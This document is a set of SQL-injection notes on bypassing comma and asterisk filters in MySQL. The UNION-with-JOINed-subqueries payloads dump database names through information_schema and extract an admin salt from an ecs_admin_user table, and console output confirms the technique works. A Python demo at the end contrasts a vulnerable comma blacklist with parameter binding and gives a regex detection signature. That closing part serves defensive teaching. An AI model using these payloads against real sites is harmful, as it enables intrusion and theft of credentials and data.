select * from aaa union select * from ((select 1)a JOIN (select 2)b JOIN (select 3 )c);
// the 1, 2, 3 here get replaced with SQL statements
Injection point: select * from aaa (sql);
Because commas are not allowed, the first idea was the following:
select * from aaa union select * from ((select user())a JOIN (select 2)b JOIN (select 3 from user)c);
select * from aaa union select 1,2,3 from user;
Dumping the database names: <group_concat() is needed, because limit 0,1 cannot be used since it contains a comma>
select * from xxx_admin where id = -1 UNION SELECT * FROM ((SELECT group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)a JOIN (SELECT 2)b JOIN (SELECT 3)c);
This does not work: <there is already a FROM earlier, so another FROM cannot follow it; this means every statement can only be substituted in place of the 1, 2, 3>
select * from xxx_admin where id = -1 union select * from ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c) from information_schema.SCHEMATA
When substring(column_name,1,4) cannot be used because the comma is filtered, use: substring(column_name from 1 for 4)
Solution:
and 1=2 union select hex(substring(ec_salt from 1 for 4)) from ecs_admin_user where user_id=1 order by attr_price desc;
When both the comma and the * are filtered, solution: <you only need to know the name of one column>
mysql> select * from ((select user())a join (select 2)b join (select 3)c );
+----------------+---+---+
| user() | 2 | 3 |
+----------------+---+---+
| root@localhost | 2 | 3 |
+----------------+---+---+
1 row in set (0.02 sec)
mysql> select user() from ((select user())a join (select 2)b join (select 3)c );
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.01 sec)
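As an added example that is not part of these notes, the Python/sqlite3 code below shows why a comma blacklist in front of string-concatenated SQL does not stop the JOIN-based UNION shape above, while parameter binding does; the xxx_admin table, its row and the regex signature are constructed for the demo.

```python
import re
import sqlite3

# Constructed sample schema for the demo (assumption: a three-column admin table).
SCHEMA = """
CREATE TABLE xxx_admin (id INTEGER, username TEXT, password TEXT);
INSERT INTO xxx_admin VALUES (1, 'admin', 'secret-hash');
"""


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def comma_blacklist(user_input: str) -> str:
    """The kind of filter the notes work around: it only rejects commas."""
    if "," in user_input:
        raise ValueError("comma not allowed")
    return user_input


def vulnerable_lookup(db: sqlite3.Connection, id_param: str):
    # String concatenation: the filter sees no comma, so a UNION built from
    # JOINed single-column subqueries passes straight through.
    sql = "select * from xxx_admin where id = " + comma_blacklist(id_param)
    return db.execute(sql).fetchall()


def safe_lookup(db: sqlite3.Connection, id_param: str):
    # Parameter binding: the input is treated as a value, never as SQL text,
    # so no blacklist is needed at all.
    return db.execute("select * from xxx_admin where id = ?", (id_param,)).fetchall()


def suspicious_join_union(user_input: str) -> bool:
    """Detection signature (constructed) for the comma-free UNION shape:
    'union select * from ((select ...' as seen in the notes."""
    pattern = r"union\s+select\s+\*\s+from\s*\(\s*\(\s*select"
    return re.search(pattern, user_input, re.IGNORECASE) is not None


# Comma-free UNION payload shape from the notes, used here only to show the bypass.
PAYLOAD = "-1 union select * from ((select 1)a join (select 2)b join (select 3)c)"
```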